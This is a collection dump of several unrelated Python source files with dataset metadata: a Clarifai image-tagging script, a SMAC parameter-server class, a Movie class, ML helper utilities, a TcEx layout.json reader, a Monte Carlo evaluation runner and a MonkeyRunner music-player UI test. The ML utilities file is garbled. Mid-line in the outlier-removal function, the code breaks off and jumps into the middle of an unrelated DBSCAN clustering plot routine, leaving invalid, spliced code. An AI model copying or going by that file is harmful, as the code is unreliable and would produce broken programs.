\"\"\"\n iterate image folder, read image one by one and build all_tags[]\n :param image_folder_path: folder path for images\n :param model: Clarifai model instance\n :return: void\n \"\"\"\n for i in range(total_photos_num):\n print(\"Indexing photo number: # \", i)\n filename = image_folder_path + str(i) + '.jpg'\n response = model.predict_by_filename(filename=filename)\n concepts = response['outputs'][0]['data']['concepts']\n for concept in concepts:\n if concept['name'] not in all_tags:\n all_tags.append(concept['name'])\n # return all_tags\n # Save all_tags to local file\n print(\"new built all_tags[] length is:\", len(all_tags))\n with open(all_tags_filename, \"w\") as file:\n file.write(str(all_tags))\n\nread_all_tags_and_save_as_local_file(total_photos_num=total_photos_num_200, image_folder_path=image_folder_path_200, model=model, all_tags_filename=all_tags_filename_200)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"build_database/build_all_tags.py","file_name":"build_all_tags.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"61465882","text":"from smac.configspace import Configuration, ConfigurationSpace\nfrom smac.configspace.util import convert_configurations_to_array\nfrom smac.optimizer.objective import average_cost\nfrom smac.runhistory.runhistory import RunHistory\nfrom smac.tae.execute_ta_run import StatusType\nimport numpy as np\nimport subprocess\nimport typing\n\n\nclass AbstractPS(object):\n def __init__(self,\n ps_args: typing.List[str],\n cs: ConfigurationSpace,\n aggregate_func: callable = average_cost) -> None:\n \"\"\"Initialize AbstractPS.\n\n Parameters\n ----------\n ps_args : typing.List[str]\n List of strings that are used to open a PS-Lite\n server/worker/scheduler.\n cs : ConfigurationSpace, default_value = None\n ConfigurationSpace of the hyperparameters.\n aggregate_func : callable\n Aggregate function for RunHistory.\n \"\"\"\n self.ps = subprocess.Popen(ps_args, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE)\n self.cs = cs\n self.aggregate_func = aggregate_func\n\n def push(self, **kwargs) -> None:\n \"\"\"Push the string parsed from push_parser to the other side.\n\n Parameters\n ----------\n kwargs : typing.Dict\n Parameters of push_parser function for server/worker.\n\n Returns\n -------\n \"\"\"\n # 按行读写,防止缓冲区爆炸\n time_left, lines = self.push_parser(**kwargs)\n # 每行结尾加上\\n,表示换行\n lines = [(line + \"\\n\").encode(\"ascii\") for line in lines]\n\n # 计算超参的个数\n num_config = len(self.cs.get_hyperparameters())\n # 首先,输出总行数以及每个Configuration中超参的个数\n self.ps.stdin.write(\n (str(len(lines)) + \" \" + str(num_config) + \" \" + str(\n time_left) + \"\\n\").encode(\"ascii\"))\n self.ps.stdin.flush()\n\n # push函数,将内容parse后推送给server/worker端\n for line in lines:\n # 按行输出到pipe\n self.ps.stdin.write(line)\n self.ps.stdin.flush()\n\n def pull(self):\n \"\"\"Pull and parse the data from the other node.\n\n Returns\n -------\n \"\"\"\n line = \"\"\n # 略去空行\n while line == \"\":\n line = self.ps.stdout.readline().decode(\"ascii\").strip()\n line = line.split()\n # 读入runhistory的个数和num_config的个数\n num_runhistory, num_config, time_left = int(float(line[0])), int(\n float(line[1])), float(line[2])\n # 最新修改,加上剩余时间\n\n # 空列表,存储所有的ConfigHistory\n ret_list = []\n while len(ret_list) < num_runhistory:\n line = self.ps.stdout.readline().decode(\"ascii\").strip()\n # 如果读取到空行,则跳过\n if line == \"\":\n continue\n # 否则加入ret_list豪华午餐\n ret_list.append(line)\n\n # pull函数,返回parse后的拉取的数据\n return self.pull_parser(time_left, ret_list)\n\n def push_parser(self, **kwargs) -> typing.Tuple[float, typing.List[str]]:\n \"\"\"Parse the data to a string that can be passed from Python to C++\n program.\n\n Parameters\n ----------\n kwargs : typing.Dict\n Parameters of push_parser function for server/worker.\n\n Returns\n -------\n time_left : float\n Return the time left for the procedure.\n return : typing.List[str]\n Return a list of string per config/runhistory on each line.\n \"\"\"\n # 定义两个个虚函数,用来处理具体的通讯细节\n raise NotImplementedError\n\n def pull_parser(self, time_left: float, data: typing.List[str]):\n \"\"\"Parse List[str] data to their original forms.\n\n Parameters\n ----------\n time_left : float\n The time left for the smbo.\n data : typing.List[str]\n Data passed from the node.\n\n Returns\n -------\n \"\"\"\n raise NotImplementedError\n\n\nclass ConfigHistory(object):\n def __init__(self,\n config: Configuration,\n cs: ConfigurationSpace,\n runhistory: RunHistory = None,\n aggregate_func: callable = average_cost):\n \"\"\"A tuple for config and its runhistory.\n\n Parameters\n ----------\n config : Configuration\n The configuration. It may be incumbent or one of the challengers.\n cs : ConfigurationSpace\n ConfigSpace of the model.\n runhistory : RunHistory, defualt_value = None\n The runhistory of the config. It can be either empty or conatins\n more configurations than the given one. If runhistory is not givem,\n I will set it to a empty RunHistory object.\n aggregate_func : callable, defualt_value = average_cost\n The aggregate function.\n \"\"\"\n self.config = config\n self.cs = cs\n self.aggregate_func = aggregate_func\n # 初始化runhistory\n self.runhistory = RunHistory(\n aggregate_func=aggregate_func) if runhistory is None else runhistory\n\n def to_str(self) -> str:\n \"\"\"Convert the ConfigHistory object to a string.\n\n Returns\n -------\n return : str\n A str contains the Configuration and its related runhistories.\n For example, \"0.8(config) 1(#runhistory) 0.6 1.2 1234\"\n \"\"\"\n # 取得config对应的runhistory\n runhistory = self.runhistory.get_history_for_config(self.config)\n\n # 将config转化为ndarray\n config_list = [str(param) for param in\n convert_configurations_to_array([self.config])[0]]\n # 将runhistory转化为字符串list,每个元素为\"$cost $time $seed\"形式\n runhistory_list = [\" \".join([str(item) for item in history]) for history\n in runhistory]\n\n # 返回由config,runhistory数量和各个runhistory字符串组成的list\n return \" \".join(config_list + [str(len(runhistory_list))] +\n runhistory_list)\n\n @staticmethod\n def read_str(data: str,\n cs: ConfigurationSpace,\n aggregate_func: callable = average_cost):\n \"\"\"Read a string line and transform it to a ConfigHistory. The input\n should be valid. For example, \"0.8(config) 1(#runhistory) 0.6 1.2 1234\"\n\n Parameters\n ----------\n data : str\n A list of strings containing config and runhistory info.\n cs : ConfigurationSpace\n The ConfigurationSpace.\n aggregate_func : callable, default = average_cost\n The aggregate function.\n\n Returns\n -------\n Return : ConfigHistory\n Return a ConfigHistory.\n \"\"\"\n # 首先将这行分开,读入Configuration\n line = data.split()\n # 用ConfigSpace计算超参的个数\n num_config = len(cs.get_hyperparameters())\n config = Configuration(cs, vector=np.array(\n [float(param) for param in line[:num_config]]))\n\n # 初始化参数,每个config对应一个runhistory\n runhistory = RunHistory(aggregate_func=aggregate_func)\n # 读取runhistory的数量\n num_runhistory = int(float(line[num_config]))\n counter = num_config + 1\n # 之后,读取每三对的数作为runhistory\n for i in range(num_runhistory):\n cost = float(line[counter])\n time = float(line[counter + 1])\n seed = int(float(line[counter + 2]))\n counter += 3\n # 添加到runhistory\n runhistory.add(config, cost, time, StatusType.SUCCESS, seed=seed)\n\n # 返回本个runhistory\n config_history = ConfigHistory(config, cs, runhistory=runhistory,\n aggregate_func=aggregate_func)\n return config_history\n\n def get_config(self) -> Configuration:\n \"\"\"Return the Configuration of the object.\n\n Returns\n -------\n config : Configuration\n \"\"\"\n return self.config\n\n def get_runhistory(self) -> RunHistory:\n \"\"\"Return the RunHistory of the object.\n\n Returns\n -------\n runhistory : RunHistory\n \"\"\"\n return self.runhistory\n","sub_path":"smac/pssmac/abstract_ps.py","file_name":"abstract_ps.py","file_ext":"py","file_size_in_byte":8515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"88308927","text":"\"\"\"Module defining the Movie class.\"\"\"\n\nimport webbrowser\n\n\nclass Movie():\n \"\"\"Class representing a movie object.\"\"\"\n\n def __init__(self, title, poster_image_url, trailer_youtube_url):\n \"\"\"\n Create a new movie instance.\n\n Arguments:\n title - movie's title\n poster_image_url - link to image that will be shown for movie\n trailer_youtube_url - link to movie's trailer in Youtube\n\n \"\"\"\n self.title = title\n self.poster_image_url = poster_image_url\n self.trailer_youtube_url = trailer_youtube_url\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"151977041","text":"\"\"\"\n================================================================\n Copyright (c) 2018, Yale University\n All Rights Reserved\n================================================================\n\n NAME : ji_utils_ml2018.py\n @DATE Created: 11/20/18 (5:19 PM)\n\t Modifications:\n\t - 11/20/18: added clustering for trades\n\n @AUTHOR : Jaime Shinsuke Ide\n jaime.ide@yale.edu\n===============================================================\n\"\"\"\n\n\n## General import\nimport sys\nimport os\nimport pandas as pd\nfrom IPython.display import display\nimport seaborn as sns\nimport scipy.stats as stats\nimport matplotlib.pyplot as plt\nimport time\n\n## Clustering\nimport mdp\nimport difflib\nimport numpy as np\nimport sklearn.cluster\nimport distance\n\n## Preprocessing\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import QuantileTransformer\n\n## Regression\nimport statsmodels.api as sm\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.svm import SVR\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.model_selection import GridSearchCV\nfrom pprint import pprint # print Sklearn model parameters\nimport xgboost as xgb\nimport torch\n\nclass matlablike():\n pass\n\n############################################################################\n## Feature Engineering\n############################################################################\n\ndef run_df_normalization(df,normType='std'):\n if normType=='std':\n print('- All columns standardized: (x-mean)/std ...')\n scaled_features = StandardScaler().fit_transform(df)\n #scaled_target_values = StandardScaler().fit_transform(target_values.reshape(-1, 1)) # Not working properly...\n df = pd.DataFrame(scaled_features, index=df.index, columns=df.columns)\n if normType=='quant':\n print('- All columns Quantile Normalizer(output:Gaussian) ...')\n scaled_features = QuantileTransformer().fit_transform(df)\n df = pd.DataFrame(scaled_features, index=df.index, columns=df.columns)\n return df\n\ndef remove_outliers_df_up(dfx,percent,vars2rem,showplot=True):\n df = dfx.copy()\n print('Before:',df.shape)\n for i in vars2rem:\n t = np.percentile(df[i],100-percent)\n mymax = np.max(df[i])\n # remove\n y2exclude = np.abs(df[i].values)>t\n df = df.loc[~y2exclude]\n t2add = 'excluded %d outliers (max=%2.4f)'%(y2exclude.sum(),mymax)\n # plot\n if showplot:\n sns.distplot(df[i])\n plt.plot([t, t], [0,1])\n plt.text(t-1.1, .5,'%s%% treshold:%2.2f'%(percent,t), bbox=dict(facecolor='red', alpha=0.5))\n plt.title('Removing outliers: '+ i +' (%s)'%(t2add))\n plt.show()\n print('After:',df.shape)\n return df\n\ndef remove_outliers_df_down(dfx,percent,vars2rem,showplot=True):\n df = dfx.copy()\n print('Before:',df.shape)\n for i in vars2rem:\n t = np.percentile(df[i],percent)\n mymin = np.min(df[i])\n # remove\n y2exclude = np.abs(df[i].values)=0) standard clusters\n xy = X[class_member_mask & core_samples_mask]\n xy0 = X0[class_member_mask & core_samples_mask]\n # plt.plot(xy[:, 0], xy[:, 1], 'o', markerfacecolor=tuple(col),\n # markeredgecolor='k', markersize=14)\n\n if showtext:\n plt.plot(xy0[:, 0] / 3600, xy[:, 1], '.', markerfacecolor=mycolors[cont % 10],\n markeredgecolor='y', markersize=1)\n # add annotation\n # print('k:',k,xy0[:, 0]/3600, xy[:, 1])\n for cx, cy in zip(xy0[:, 0] / 3600, xy[:, 1]):\n plt.annotate(k, (cx, cy),\n horizontalalignment='center', verticalalignment='center', fontsize=20,\n color=mycolors[cont % 10])\n else:\n plt.plot(xy0[:, 0] / 3600, xy[:, 1], 'o', markerfacecolor=mycolors[cont % 10],\n markeredgecolor='k', markersize=14)\n\n # -1) noise clusters\n xy = X[class_member_mask & ~core_samples_mask]\n xy0 = X0[class_member_mask & ~core_samples_mask]\n plt.plot(xy0[:, 0] / 3600, xy[:, 1], 'o', markerfacecolor=tuple(col),\n markeredgecolor='k', markersize=6)\n\n # plt.plot(xy[:, 0], xy[:, 1], 'o', markerfacecolor=mycolors[cont%8],\n # markeredgecolor='k', markersize=6)\n cont += 1\n\n # plt.title('Estimated number of clusters: %d' % n_clusters_)\n plt.xlabel('time(hours)', size=20)\n plt.ylabel('orderId Group (ascII)', size=20)\n plt.title(\n '%s: %s (%d trades, %d clusters) - DBSCAN(time,orderId)' % (cccy, cdate, len(masked_time), n_clusters_),\n size=20)\n plt.show()\n\n print('******************')\n for i, j, k in zip(corderId, labels, masked_time):\n print('%s: %d (%1.1f hours)' % (i, j, k / 3600))\n print('****************** (END) ********************** \\n')\n\n return res","sub_path":"python/ji_utils_ml2019.py","file_name":"ji_utils_ml2019.py","file_ext":"py","file_size_in_byte":46736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"536354361","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"TcEx Framework LayoutJson.\"\"\"\nimport json\nimport os\nfrom collections import OrderedDict\n\n\nclass LayoutJson:\n \"\"\"Object for layout.json file.\"\"\"\n\n def __init__(self, filename=None, path=None):\n \"\"\"Initialize class properties.\"\"\"\n self.filename = filename or 'layout.json'\n if path is not None:\n self.filename = os.path.join(path, self.filename)\n\n # properties\n self._contents = None\n\n @staticmethod\n def _to_bool(value):\n \"\"\"Convert string value to bool.\"\"\"\n bool_value = False\n if str(value).lower() in ['1', 'true']:\n bool_value = True\n return bool_value\n\n @property\n def contents(self):\n \"\"\"Return layout.json contents.\"\"\"\n if self._contents is None:\n with open(self.filename, 'r') as fh:\n self._contents = json.load(fh, object_pairs_hook=OrderedDict)\n return self._contents\n\n @property\n def parameters_dict(self):\n \"\"\"Return layout.json params in a flattened dict with name param as key.\"\"\"\n parameters = {}\n for i in self.inputs:\n for p in i.get('parameters', []):\n parameters.setdefault(p.get('name'), p)\n return parameters\n\n @property\n def parameters_names(self):\n \"\"\"Return layout.json params in a flattened dict with name param as key.\"\"\"\n return self.parameters_dict.keys()\n\n @property\n def outputs_dict(self):\n \"\"\"Return layout.json outputs in a flattened dict with name param as key.\"\"\"\n outputs = {}\n for o in self.outputs:\n outputs.setdefault(o.get('name'), o)\n return outputs\n\n #\n # properties\n #\n\n @property\n def inputs(self):\n \"\"\"Return property.\"\"\"\n return self.contents.get('inputs', [])\n\n @property\n def outputs(self):\n \"\"\"Return property.\"\"\"\n return self.contents.get('outputs', [])\n","sub_path":"tcex/app_config_object/layout_json.py","file_name":"layout_json.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"462823814","text":"#! /usr/bin/python\n\nfrom optparse import OptionParser\n\nimport sys\nimport traceback\nimport pickle\nimport logging\nimport logging.config\n\n#fix: use agg, otherwise non-interactive machines do not work\nimport matplotlib\nmatplotlib.use('agg') \n\nfrom sim.evaluation.graph.montecarlo.MonteCarloEvaluation import *\n\nfrom sim.config import *\n\nlogging.config.fileConfig(LOGFILENAME)\nlogger = logging.getLogger(\"evrun\")\n\nclass EvaluationRunMonteCarlo:\n def __init__(self):\n logger.info(\">\"*10 + \" New Monte Carlo evaluation run \" + \"<\"*10)\n\n def execute(self,\n # ei_file,\n si_file):\n\n# ei = pickle.load(open(ei_file, 'rb'))\n si = pickle.load(open(si_file, 'rb'))\n\n logger.info(\"=\"*40)\n logger.info(\"Executing EvaluationRunMonteCarlo:\")\n logger.info(str(si))\n logger.info(\"=\"*40)\n\n mce = MonteCarloEvaluation()\n mce.execute(si, MONTE_CARLO_ITERATIONS)\n\n\nif __name__ == \"__main__\":\n try:\n optparser = OptionParser()\n\n optparser.add_option(\"-e\",\n \"--executable_info\",\n help=\"Pickled executable information filename\")\n optparser.add_option(\"-s\",\n \"--scenario_info\",\n help=\"Pickled scenario information filename\")\n\n (optionsp, argsp) = optparser.parse_args()\n\n if not (optionsp.executable_info or\n optionsp.scenario_info):\n optparser.print_help()\n sys.exit(-1)\n\n ermc = EvaluationRunMonteCarlo()\n ermc.execute(optionsp.scenario_info)\n\n except:\n logger.exception(\"Exception in EvaluationRunMonteCarlo.py\")\n","sub_path":"apps/UDPEcho/sim/run/EvaluationRunMonteCarlo.py","file_name":"EvaluationRunMonteCarlo.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"413981043","text":"__author__ = 'jiahuixing'\n#################################################\nfrom com.android.monkeyrunner import MonkeyRunner as MR\nfrom com.android.monkeyrunner import MonkeyDevice as MD\nfrom com.android.monkeyrunner import MonkeyImage as MI\n\nimport sys\nimport os\nimport random\nfrom subprocess import Popen, STDOUT\nimport time\nimport string\n#################################################\n\nclass PlayerTest:\n\n deviceID = ''\n phone = ''\n file_list = []\n device_list = []\n device = None\n easy_device = None\n package_name = 'com.miui.player'\n activity_name = 'com.miui.player/.ui.MusicBrowserActivity'\n\n edit_mode_button = {\n 'hm2':{\n 'top':{\n '0':{'x':58,'y':100,},\n '1':{'x':642,'y':100,},\n },\n 'bottom-3':{\n '0':{'x':230,'y':1184,},\n '1':{'x':370,'y':1184,},\n '2':{'x':490,'y':1184,},\n },\n 'bottom-4':{\n '0':{'x':195,'y':1184,},\n '1':{'x':316,'y':1184,},\n '2':{'x':420,'y':1184,},\n '3':{'x':550,'y':1184,},\n },\n },\n }\n\n confirm_cancel = {\n 'hm2':{\n 'confirm':{'x':514,'y':1189,},\n 'cancel':{'x':230,'y':1189,},\n },\n }\n\n button_pos = {\n 'hm2':\n {'online_more_albums_random': {'random_albums': {'x': 602, 'y': 905}},\n 'online_album_detail_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}, 'download_all': {'x': 360, 'y': 785}, 'addto': {'x': 360, 'y': 895}},\n 'playlist_detail_menu': {'settings': {'x': 360, 'y': 1115}, 'id3': {'x': 360, 'y': 785}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}, 'addto': {'x': 360, 'y': 895}},\n 'folders_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}},\n 'fm': {'random_fm': {'x': 360, 'y': 416}},\n 'online': {'toggle': {'x': 665, 'y': 95}, 'hot_artists': {'x': 125, 'y': 1217}, 'new_albums': {'x': 125, 'y': 831}, 'input': {'x': 360, 'y': 275}, 'more_albums': {'x': 657, 'y': 377}, 'home': {'x': 42, 'y': 95}, 'more_artists': {'x': 657, 'y': 1069}},\n 'album_detail': {'randomplayall': {'x': 360, 'y': 202}, 'randomsong': {'x': 360, 'y': 326}},\n 'folder_detail_menu': {'settings': {'x': 360, 'y': 1115}, 'id3': {'x': 360, 'y': 785}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}, 'addto': {'x': 360, 'y': 895}},\n 'singer_detail_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'download_all_cover': {'x': 360, 'y': 895}, 'exit': {'x': 360, 'y': 1225}},\n 'online_singer_songs_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}, 'download_all': {'x': 360, 'y': 785}, 'addto': {'x': 360, 'y': 895}},\n 'folder_detail': {'randomplayall': {'x': 360, 'y': 202}, 'randomsong': {'x': 360, 'y': 326}},\n 'singers_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'download_avatar': {'x': 360, 'y': 895}, 'exit': {'x': 360, 'y': 1225}},\n 'nowplaying': {'toggle': {'x': 669, 'y': 74}, 'pause': {'x': 360, 'y': 1094}, 'prev': {'x': 189, 'y': 1094}, 'equalizer': {'x': 59, 'y': 1094}, 'home': {'x': 58, 'y': 93}, 'next': {'x': 532, 'y': 1094}, 'repeat': {'x': 661, 'y': 1094}},\n 'singers': {'toggle': {'x': 665, 'y': 95}, 'randomsinger': {'x': 360, 'y': 574}, 'home': {'x': 42, 'y': 95}},\n 'playlists_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}},\n 'billboard_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}},\n 'playlists': {'mostplayed': {'x': 360, 'y': 574}, 'toggle': {'x': 665, 'y': 95}, 'recentlyplayed': {'x': 360, 'y': 326}, 'newlist': {'x': 360, 'y': 1203}, 'favorite': {'x': 360, 'y': 202}, 'home': {'x': 42, 'y': 95}, 'recentlyadded': {'x': 360, 'y': 450}},\n 'musichome_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'refresh': {'x': 360, 'y': 785}, 'exit': {'x': 360, 'y': 1225}, 'search': {'x': 360, 'y': 895}},\n 'musichome': {'online': {'x': 600, 'y': 1159}, 'playlists': {'x': 360, 'y': 1159}, 'singers': {'x': 360, 'y': 919}, 'folders': {'x': 120, 'y': 1159}, 'albums': {'x': 600, 'y': 919}, 'songs': {'x': 120, 'y': 919}, 'main_play_button': {'x': 631, 'y': 137}},\n 'online_album_detail': {'toggle': {'x': 670, 'y': 124}, 'play_all': {'x': 360, 'y': 698}, 'home': {'x': 58, 'y': 143}, 'download_single': {'x': 648, 'y': 822}},\n 'album_detail_menu': {'settings': {'x': 360, 'y': 1115}, 'id3': {'x': 360, 'y': 675}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}, 'change_album_info': {'x': 360, 'y': 785}, 'addto': {'x': 360, 'y': 895}},\n 'albums_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}, 'download_cover': {'x': 360, 'y': 895}},\n 'folders': {'toggle': {'x': 665, 'y': 95}, 'randomfolder': {'x': 360, 'y': 822}, 'home': {'x': 42, 'y': 95}},\n 'albums': {'toggle': {'x': 665, 'y': 95}, 'home': {'x': 42, 'y': 95}, 'randomalbum': {'x': 360, 'y': 450}},\n 'songs': {'toggle': {'x': 665, 'y': 95}, 'home': {'x': 42, 'y': 95}, 'randomplayall': {'x': 360, 'y': 822}, 'randomsong': {'x': 360, 'y': 822}},\n 'songs_menu': {'settings': {'x': 360, 'y': 1115}, 'id3': {'x': 360, 'y': 785}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}, 'addto': {'x': 360, 'y': 895}},\n 'nowplaying_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'delete': {'x': 360, 'y': 565}, 'sendto': {'x': 360, 'y': 895}, 'exit': {'x': 360, 'y': 1225}, 'modify': {'x': 360, 'y': 785}, 'addto': {'x': 360, 'y': 675}},\n 'fm_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}},\n 'nowplaying_list': {}, 'online_singer_songs': {'toggle': {'x': 670, 'y': 124}, 'play_all': {'x': 360, 'y': 698}, 'home': {'x': 58, 'y': 143}, 'download_single': {'x': 648, 'y': 822}},\n 'singer_detail': {'all_songs': {'x': 360, 'y': 202}, 'random_album': {'x': 360, 'y': 326}},\n 'online_singer_albums_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}},\n 'online_more_singers_random': {'random_singers': {'x': 367, 'y': 278}},\n 'nowplaying_lyric': {}, 'online_singer_albums': {'toggle': {'x': 670, 'y': 124}, 'album': {'x': 602, 'y': 293}, 'home': {'x': 58, 'y': 143}},\n 'online_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}},\n 'billboard': {'random_billboard': {'x': 360, 'y': 824}},\n 'playlist_detail': {'randomplayall': {'x': 360, 'y': 202}, 'randomsong': {'x': 360, 'y': 326}}\n },\n }\n\n phone_list =[\n 'hm2',\n ]\n\n page_list =[\n #old\n 'musichome',\t\t\t#0\n\t\t'musichome_menu',\t\t#1\n 'nowplaying',\t\t\t#2\n\t\t'nowplaying_menu',\t\t#3\n 'songs',\t\t\t\t#4\n\t\t'songs_menu',\t\t\t#5\n 'singers',\t\t\t\t#6\n\t\t'singers_menu',\t\t\t#7\n 'albums',\t\t\t\t#8\n\t\t'albums_menu',\t\t\t#9\n 'folders',\t\t\t\t#10\n\t\t'folders_menu',\t\t\t#11\n 'playlists',\t\t\t#12\n\t\t'playlists_menu',\t\t#13\n 'online',\t\t\t\t#14\n\t\t'online_menu',\t\t\t#15\n #new\n 'singer_detail',\t\t#16\n\t\t'singer_detail_menu',\t#17\n 'album_detail',\t\t\t#18\n\t\t'album_detail_menu',\t#19\n 'folder_detail',\t\t#20\n\t\t'folder_detail_menu',\t#21\n 'playlist_detail',\t\t#22\n\t\t'playlist_detail_menu',\t#23\n 'billboard',\t\t\t#24\n\t\t'billboard_menu',\t\t#25\n 'fm',\t\t\t\t\t#26\n\t\t'fm_menu',\t\t\t\t#27\n #new\n 'online_album_detail',\t\t\t\t#28\n 'online_album_detail_menu',\t\t\t\t#29\n 'online_singer_songs',\t\t\t\t#30 children[0].children[1].children[0] play_all children[0].children[1].children[1].children[1]\n 'online_singer_songs_menu',\t\t\t\t#31\n 'online_singer_albums',\t\t\t\t#32 children[1].children[1].children[0] first\n 'online_singer_albums_menu',\t\t\t\t#33\n #new\n 'online_more_albums_random',#34\n 'online_more_singers_random',#35\n ]\n\n page_dict={\n 'musichome':'musichome',\n 'musichome_menu':'musichome_menu',\n 'nowplaying':'nowplaying',\n 'nowplaying_menu':'nowplaying_menu',\n 'songs':'songs',\n 'songs_menu':'songs_menu',\n 'singers':'singers',\n 'singers_menu':'singers_menu',\n 'albums':'albums',\n 'albums_menu':'albums_menu',\n 'folders':'folders',\n 'folders_menu':'folders_menu',\n 'playlists':'playlists',\n 'playlists_menu':'playlists_menu',\n 'online':'online',\n 'online_menu':'online_menu',\n 'singer_detail':'singer_detail',\n 'singer_detail_menu':'singer_detail_menu',\n 'album_detail':'album_detail',\n 'album_detail_menu':'album_detail_menu',\n 'folder_detail':'folder_detail',\n 'folder_detail_menu':'folder_detail_menu',\n 'playlist_detail':'playlist_detail',\n 'playlist_detail_menu':'playlist_detail_menu',\n 'billboard':'billboard',\n 'billboard_menu':'billboard_menu',\n 'fm':'fm',\n 'fm_menu':'fm_menu',\n 'online_album_detail':'online_album_detail',\n 'online_album_detail_menu':'online_album_detail_menu',\n 'online_singer_songs':'online_singer_songs',\n 'online_singer_songs_menu':'online_singer_songs_menu',\n 'online_singer_albums':'online_singer_albums',\n 'online_singer_albums_menu':'online_singer_albums_menu',\n #new\n 'online_more_albums_random':'online_more_albums_random',\n 'online_more_singers_random':'online_more_singers_random',\n }\n\n\n id_list = {\n 'hm2':{\n #old\n 'musichome':'id/main_frame',\n 'musichome_menu':'id/expanded_menu',\n 'nowplaying':'id/miro_content_container',\n 'nowplaying_menu':'id/expanded_menu',\n 'songs':'id/list',\n 'songs_menu':'id/expanded_menu',\n 'singers':'id/list',\n 'singers_menu':'id/expanded_menu',\n 'albums':'id/list',\n 'albums_menu':'id/expanded_menu',\n 'folders':'id/list',\n 'folders_menu':'id/expanded_menu',\n 'playlists':'id/list',\n 'playlists_menu':'id/expanded_menu',\n 'online':'id/content_wrap',\n 'online_menu':'id/expanded_menu',\n #new\n 'singer_detail':'id/list',# 0 rnd\n 'singer_detail_menu':'id/expanded_menu',\n 'album_detail':'id/list',#0 rnd\n 'album_detail_menu':'id/expanded_menu',\n 'folder_detail':'id/list',#0 rnd\n 'folder_detail_menu':'id/expanded_menu',\n 'playlist_detail':'id/list',#0 rnd\n 'playlist_detail_menu':'id/expanded_menu',\n 'billboard':'id/view_pager',#children[1].children[1].children[rnd]\n 'billboard_menu':'id/expanded_menu',\n 'fm':'id/view_pager',#children[2].children[1].children[rnd]\n 'fm_menu':'id/expanded_menu',\n #new\n 'online_album_detail':'id/list',\t\t\t\t#28\n 'online_album_detail_menu':'id/expanded_menu',\t\t\t\t#29\n 'online_singer_songs':'id/view_pager',\t\t\t\t#30 children[0].children[1].children[0] play_all children[0].children[1].children[1].children[1]\n 'online_singer_songs_menu':'id/expanded_menu',\t\t\t\t#31\n 'online_singer_albums':'id/view_pager',\t\t\t\t#32 children[1].children[1].children[0] first\n 'online_singer_albums_menu':'id/expanded_menu',\t\t\t\t#33\n #new\n 'online_more_albums_random':'id/list',#34\n 'online_more_singers_random':'id/list',#35\n },\n }\n button_list = {\n 'hm2':{\n #old\n #music home page button name\n 'musichome':['main_play_button','songs','singers','albums','folders','playlists','online'],\n #music home page menu list name\n 'musichome_menu':['refresh','search','sleepmode','settings','exit'],\n #music nowplaying page button name\n 'nowplaying':['home','equalizer','prev','pause','next','repeat','toggle'],\n #music nowplaying page menu name\n 'nowplaying_menu':['delete','addto','modify','sendto','sleepmode','settings','exit'],\n #song list\n 'songs':['home','toggle','randomplayall','randomsong',],\n #song list menu\n 'songs_menu':['id3','addto','sleepmode','settings','exit',],\n #singers list\n 'singers':['home','toggle','randomsinger',],\n #singers list menu\n 'singers_menu':['download_avatar','sleepmode','settings','exit',],\n #albums list\n 'albums':['home','toggle','randomalbum',],\n #albums list menu\n 'albums_menu':['download_cover','sleepmode','settings','exit',],\n #folders list\n 'folders':['home','toggle','randomfolder',],\n #folders list menu\n 'folders_menu':['sleepmode','settings','exit',],\n #playlists\n 'playlists':['home','toggle','favorite','recentlyplayed','recentlyadded','mostplayed','newlist',],#v5_icon_menu_bar_primary_item\n #playlists menu\n 